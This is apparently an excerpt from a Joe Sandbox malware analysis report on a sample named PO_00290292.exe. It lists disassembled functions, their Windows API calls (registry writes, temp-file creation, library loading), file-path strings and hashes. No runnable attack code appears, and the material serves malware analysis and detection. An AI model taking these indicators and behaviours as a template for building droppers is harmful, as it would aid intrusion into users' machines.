                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                  • String ID: %derivering%\gadedrenges$C:\Users\user\AppData\Local\blindsmagningen\Nonprocurement$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini$practical
                                                                  • API String ID: 1941528284-3816768022
                                                                  • Opcode ID: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                                  • Instruction ID: b64174440326d41e90dd14f1ad6608c73badddfa8ee8632f400ec40acf256ac3
                                                                  • Opcode Fuzzy Hash: adcefff22d6d35a46cade79b64999059c3ac28fc575844980da9404600bf010c
                                                                  • Instruction Fuzzy Hash: 0C41C431900515BACF117FB5CC46DAE3679EF05329B20827BF422F51E2DA3C86629A6D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004052DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 622 4052dd-4052f2 623 4052f8-405309 622->623 624 4053a9-4053ad 622->624 625 405314-405320 lstrlenW 623->625 626 40530b-40530f call 4061a0 623->626 628 405322-405332 lstrlenW 625->628 629 40533d-405341 625->629 626->625 628->624 630 405334-405338 lstrcatW 628->630 631 405350-405354 629->631 632 405343-40534a SetWindowTextW 629->632 630->629 633 405356-405398 SendMessageW * 3 631->633 634 40539a-40539c 631->634 632->631 633->634 634->624 635 40539e-4053a1 634->635 635->624
                                                                  APIs
                                                                  • lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 00405315
                                                                  • lstrlenW.KERNEL32(00402E19,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 00405325
                                                                  • lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,00402E19), ref: 00405338
                                                                  • SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\), ref: 0040534A
                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405370
                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538A
                                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405398
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                  • String ID: Remove folder: C:\Users\user\AppData\Local\Temp\nsp6601.tmp\
                                                                  • API String ID: 2531174081-2912221903
                                                                  • Opcode ID: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                  • Instruction ID: d14990956ab1253184f877e9e8298894284f42a30aea32824f5004b5108fa95f
                                                                  • Opcode Fuzzy Hash: e0d278b4f454602652d1392a5fb3045d02927be56822f9b38c604404e895085a
                                                                  • Instruction Fuzzy Hash: 62217F71900518BACF119FA6DD44ACFBFB8EF85354F10807AF904B62A1C7B94A51DFA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004057AC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 636 4057ac-4057f7 CreateDirectoryW 637 4057f9-4057fb 636->637 638 4057fd-40580a GetLastError 636->638 639 405824-405826 637->639 638->639 640 40580c-405820 SetFileSecurityW 638->640 640->637 641 405822 GetLastError 640->641 641->639
                                                                  APIs
                                                                  • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004057EF
                                                                  • GetLastError.KERNEL32 ref: 00405803
                                                                  • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 00405818
                                                                  • GetLastError.KERNEL32 ref: 00405822
                                                                  Strings
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 004057D2
                                                                  • C:\Users\user\Desktop, xrefs: 004057AC
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                  • API String ID: 3449924974-1326413622
                                                                  • Opcode ID: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                  • Instruction ID: b278f7ea68de5888e34302da86fdb06c438f4ef9b03e74a9ab654546e4f81ce2
                                                                  • Opcode Fuzzy Hash: 6ae7c342d9c1b50a082fcf4789916780a4d0616efa07736c5e287c1420eecf92
                                                                  • Instruction Fuzzy Hash: 89010871D00619DADF10DBA0D9447EFBFB8EB04304F00803ADA44B6190E7789618DFA9
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004064E8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 642 4064e8-406508 GetSystemDirectoryW 643 40650a 642->643 644 40650c-40650e 642->644 643->644 645 406510-406519 644->645 646 40651f-406521 644->646 645->646 647 40651b-40651d 645->647 648 406522-406555 wsprintfW LoadLibraryExW 646->648 647->648
                                                                  APIs
                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
                                                                  • wsprintfW.USER32 ref: 0040653A
                                                                  • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                  • String ID: %s%S.dll$UXTHEME$\
                                                                  • API String ID: 2200240437-1946221925
                                                                  • Opcode ID: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                  • Instruction ID: c6b4a3c42f63eea3762d57d51081eb848d485012b63e63803453d9912f42ff06
                                                                  • Opcode Fuzzy Hash: 3e72c25e5c980310d69f0fc98d502c706aefd7165560ee14c5a883ad11fb6337
                                                                  • Instruction Fuzzy Hash: 3AF0FC70500219BADB10AB64ED0DF9B366CAB00304F10403AA646F10D0EB7CD725CBA8
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 649 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 656 4023c7-4023cf 649->656 657 402a4c-402a5b 649->657 659 4023d1-4023de call 402bbf lstrlenW 656->659 660 4023e2-4023e5 656->660 659->660 662 4023f5-4023f8 660->662 663 4023e7-4023f4 call 402ba2 660->663 667 402409-40241d RegSetValueExW 662->667 668 4023fa-402404 call 4030e7 662->668 663->662 671 402422-4024fc RegCloseKey 667->671 672 40241f 667->672 668->667 671->657 672->671
                                                                  APIs
                                                                  • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                  • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreateValuelstrlen
                                                                  • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Fiberstoffet90\cellists.ini
                                                                  • API String ID: 1356686001-1176133737
                                                                  • Opcode ID: 67c77c8d659d9d4bc82cacddac1e216fe0077c84403bdf1d9c96e54a2d3d16bf
                                                                  • Instruction ID: d84b147cfae213de6894e87518a1957a70c03431d85ade02b305fde94438308f
                                                                  • Opcode Fuzzy Hash: 67c77c8d659d9d4bc82cacddac1e216fe0077c84403bdf1d9c96e54a2d3d16bf
                                                                  • Instruction Fuzzy Hash: E511C071E00108BFEB10AFA4DE89DAE777DEB14358F11403AF904B71D1DBB85E409668
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00405D82 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 674 405d82-405d8e 675 405d8f-405dc3 GetTickCount GetTempFileNameW 674->675 676 405dd2-405dd4 675->676 677 405dc5-405dc7 675->677 679 405dcc-405dcf 676->679 677->675 678 405dc9 677->678 678->679
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00405DA0
                                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO_00290292.exe",004033B4,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 00405DBB
                                                                  Strings
                                                                  • "C:\Users\user\Desktop\PO_00290292.exe", xrefs: 00405D82
                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D87
                                                                  • nsa, xrefs: 00405D8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: CountFileNameTempTick
                                                                  • String ID: "C:\Users\user\Desktop\PO_00290292.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                  • API String ID: 1716503409-2107869092
                                                                  • Opcode ID: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                  • Instruction ID: a69a53d4b23f3d63feeda802a3e8a765614c71270742c911b33c62312df6cecc
                                                                  • Opcode Fuzzy Hash: ba752c91d03ec01f63b9c4f62f06acfe59d2ba7d741f037e803b5e880a418ded
                                                                  • Instruction Fuzzy Hash: 32F06D76600608BBDB008B59DD09AABBBB8EF91710F10803BEE01F7190E6B09A548B64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 680 402bff-402c28 RegOpenKeyExW 681 402c93-402c97 680->681 682 402c2a-402c35 680->682 683 402c50-402c60 RegEnumKeyW 682->683 684 402c62-402c74 RegCloseKey call 406558 683->684 685 402c37-402c3a 683->685 692 402c76-402c85 684->692 693 402c9a-402ca0 684->693 687 402c87-402c8a RegCloseKey 685->687 688 402c3c-402c4e call 402bff 685->688 690 402c90-402c92 687->690 688->683 688->684 690->681 692->681 693->690 695 402ca2-402cb0 RegDeleteKeyW 693->695 695->690 697 402cb2 695->697 697->681
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: Close$DeleteEnumOpen
                                                                  • String ID:
                                                                  • API String ID: 1912718029-0
                                                                  • Opcode ID: 58c60bd3f3897121054778c1da70f1d8408b3ab71b88223ff436e3f080a0af7a
                                                                  • Instruction ID: b9f5b7c8593eadded22e2ca3cbb8d83d08b5e31647f9888e60cfbaa55d101d4e
                                                                  • Opcode Fuzzy Hash: 58c60bd3f3897121054778c1da70f1d8408b3ab71b88223ff436e3f080a0af7a
                                                                  • Instruction Fuzzy Hash: 66116A71504119FFEF10AF90DF8CEAE3B79FB14384B10007AF905E11A0D7B58E55AA69
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 004031EF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 698 4031ef-403217 GetTickCount 699 403347-40334f call 402d9f 698->699 700 40321d-403248 call 40336e SetFilePointer 698->700 705 403351-403355 699->705 706 40324d-40325f 700->706 707 403261 706->707 708 403263-403271 call 403358 706->708 707->708 711 403277-403283 708->711 712 403339-40333c 708->712 713 403289-40328f 711->713 712->705 714 403291-403297 713->714 715 4032ba-4032d6 call 406697 713->715 714->715 717 403299-4032b9 call 402d9f 714->717 721 403342 715->721 722 4032d8-4032e0 715->722 717->715 723 403344-403345 721->723 724 4032e2-4032ea call 405e05 722->724 725 403303-403309 722->725 723->705 728 4032ef-4032f1 724->728 725->721 727 40330b-40330d 725->727 727->721 729 40330f-403322 727->729 730 4032f3-4032ff 728->730 731 40333e-403340 728->731 729->706 732 403328-403337 SetFilePointer 729->732 730->713 733 403301 730->733 731->723 732->699 733->729
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 00403203
                                                                    • Part of subcall function 0040336E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040306C,?), ref: 0040337C
                                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 00403236
                                                                  • SetFilePointer.KERNELBASE(00097E78,00000000,00000000,00414ED0,00004000,?,00000000,00403119,00000004,00000000,00000000,?,?,00403093,000000FF,00000000), ref: 00403331
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer$CountTick
                                                                  • String ID: x~
                                                                  • API String ID: 1092082344-1841499174
                                                                  • Opcode ID: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                  • Instruction ID: 2fd669d0756999c0d63da40b5d988076205959dac08f3783f289fe1fafb1afdd
                                                                  • Opcode Fuzzy Hash: 7f87ec3f3126c4afc5deb31522855fdbb853a78037bb661dde8e94ffc6001a55
                                                                  • Instruction Fuzzy Hash: 19314B72500204DBD710DF69EEC49663FA9F74075A718423FE900F22E0CBB55D458B9D
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                  • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1727839782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.1727827366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727852452.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1727865186.000000000047F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1728055667.0000000000480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_PO_00290292.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Timeout
